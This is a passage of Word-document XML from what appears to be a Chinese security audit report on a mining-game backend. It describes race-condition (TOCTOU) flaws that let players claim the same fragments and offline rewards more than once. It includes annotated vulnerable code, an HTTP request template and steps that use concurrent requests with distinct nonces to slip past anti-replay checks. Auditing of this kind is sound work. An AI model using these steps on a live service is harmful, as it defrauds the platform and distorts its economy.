        <w:t>数据库隔离级别为 REPEATABLE READ（MySQL 默认）时：T1、T2 各自在事务起点建立快照，若 T1 尚未提交，T2 的快照仍看不到 T1 的写入 → 同样均执行 INSERT；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">只要底层 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_miner_fragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(user_id, fragment_id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 列组合上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不存在唯一索引约束</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（代码中亦未体现任何 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>try-catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来处理约束冲突），两条并发请求即可各自成功 INSERT，使同一碎片被发放两次乃至多次。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在本游戏矿机体系中，碎片拥有明确的游戏价值（集齐碎片可组合矿机等高价值虚拟资产），重复领取等价于无限刷取稀缺资源，存在实质性经济损失风险。</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/api/fragment/check</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ SignAuthTestFilter（/api/fragment/** 在 SIGN_TEST_PATTERNS 中，校验签名+nonce防重放）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ TokenAuthFilter（/api/fragment/check 不在 NO_TOKEN_PATTERNS 白名单，强制校验 Bearer Token）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ MinerFragmentController.checkAndGrant(@CurrentUserId Long userId)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  ↓ MinerFragmentService.checkAndGrant(userId)   ← 漏洞在此</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 由网关/TokenAuthFilter 从 Token 解析注入，攻击者无法伪造，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>合法用户满足条件后可通过并发请求触发此漏洞</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入口：MinerFragmentController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/check")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;List&lt;Long&gt;&gt; checkAndGrant(@CurrentUserId Long userId) {  // ← userId 来自 Token，可信</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(minerFragmentService.checkAndGrant(userId));  // ← 并发时多个请求同时进入 service</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 漏洞点：MinerFragmentService.java</w:t>
              <w:br/>
              <w:t>@Transactional   // ← @Transactional 仅保证单事务原子性，不阻止并发事务 TOCTOU</w:t>
              <w:br/>
              <w:t>public List&lt;Long&gt; checkAndGrant(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (int fragNum = 1; fragNum &lt;= 5; fragNum++) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // ——— CHECK 阶段（非原子起点）———</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Optional&lt;UserMinerFragment&gt; ufOpt =</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userFragmentRepository.findByUserIdAndFragmentId(userId, fragmentId);  // ← T1、T2 并发时均读到"无记录"</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        boolean meets = false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        switch (fragNum) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            case FRAGMENT_KYC:</w:t>
              <w:br/>
              <w:t xml:space="preserve">                meets = Integer.valueOf(1).equals(user.getIsKycVerified());  // ← 条件检查</w:t>
              <w:br/>
              <w:t xml:space="preserve">                break;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            // ... 其他 case</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        if (meets) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            UserMinerFragment uf = ufOpt.orElseGet(() -&gt; {    // ← T1、T2 均走 orElseGet，各自 new 对象</w:t>
              <w:br/>
              <w:t xml:space="preserve">                UserMinerFragment u = new UserMinerFragment();</w:t>
              <w:br/>
              <w:t xml:space="preserve">                u.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                u.setFragmentId(fragmentId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                u.setIsObtained(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                return u;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            });</w:t>
              <w:br/>
              <w:t xml:space="preserve">            // ——— CHECK 阶段（同样基于各自的 ufOpt 快照）———</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (uf.getIsObtained() == null || uf.getIsObtained() == 0) {  // ← T1、T2 均通过此检查</w:t>
              <w:br/>
              <w:t xml:space="preserve">                uf.setIsObtained(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                uf.setObtainTime(LocalDateTime.now());</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    userFragmentRepository.save(uf);   // ← WRITE：T1 INSERT 成功；T2 也 INSERT 成功（无 DB 唯一约束保护）</w:t>
              <w:br/>
              <w:t xml:space="preserve">                granted.add(fragmentId);           // ← 碎片被重复发放</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return granted;</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利用脚本概念（同一用户并发发送 N 个请求）：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/api/fragment/check HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;满足碎片条件的合法用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;唯一nonce-N&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;按ParamSortSignUtils算法生成的签名&gt;</w:t>
              <w:b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关键：同时发出至少 10 个上述请求（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>X-Nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 各不相同以绕过 nonce 去重），使它们在时间窗口内并发到达服务端，利用 TOCTOU 窗口触发重复 INSERT。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718"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用一个满足至少一个碎片发放条件的真实用户账号（如已完成 KYC、或已完成交易），获取有效 Bearer Token；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">按 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 规则计算签名参数（</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timestamp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">、合法 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>sign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>为每个并发请求生成不同的 `nonce`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 以通过防重放校验；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="720"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用多线程或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>async/await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 工具（如 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>wrk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）在同一毫秒级时间窗口内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发发送 ≥10 个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">相同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/fragment/check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="721"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">查询数据库 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_miner_fragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表，观察同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(user_id, fragment_id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是否出现多条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>is_obtained = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的记录；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="722"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若成功，利用多余碎片在游戏内兑换矿机或其他高价值资产，造成平台虚拟经济损失。</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：在无 DB 唯一约束的情况下，并发请求中有 2 条以上成功插入同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, fragmentId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>is_obtained = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录，碎片被重复发放。</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72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 + 请求签名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="724"/>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普通已登录用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，且需满足至少一个碎片发放条件（KYC 认证 / 完成交易 / 邀请≥5人 / 签到≥28次 / 等级≥45）</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（仅供参考，非漏洞内容）：在数据库层面对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_miner_fragment(user_id, fragment_id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 添加唯一索引；同时在应用层引入用户级 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或 Redis 分布式锁，确保"查询-判断-写入"三步操作的原子性。</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725"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerFragmentController.java.checkAndGrant → MinerFragmentService.java.checkAndGrant</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audit_m161_570_checkAndGrant_ctrl-path1of2.md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：OfflineRewardService.java#calcAndClaim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_33" w:id="33"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞32：离线收益重复领取——并发竞态（TOCTOU）导致双份奖励记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="72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：离线收益重复创建 — TOCTOU 竞态条件（无事务/无锁保护）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="72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src/main/java/com/gameBack/mjservice/service/OfflineRewardService.java:calcAndClaim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="72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：资金/虚拟货币安全 · 并发竞态（TOCTOU / 幂等缺失）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="72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3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：普通用户（有效 Bearer Token + 签名）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calcAndClaim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法内对离线奖励记录的"查询是否已存在 → 不存在则写入"全程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有 `@Transactional` 注解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有数据库行级锁（SELECT … FOR UPDATE）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有 Redis 分布式锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，属于典型的先读后写（Check-Then-Act）竞态窗口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者（或客户端并发重试）只需在同一会话期内向 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/offline/calcAndClaim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同时发出多个请求，两条并发线程均能通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>offlineRewardRecordList.isEmpty()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的空检查，随后各自独立执行写入，最终在数据库中插入两条（乃至更多）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
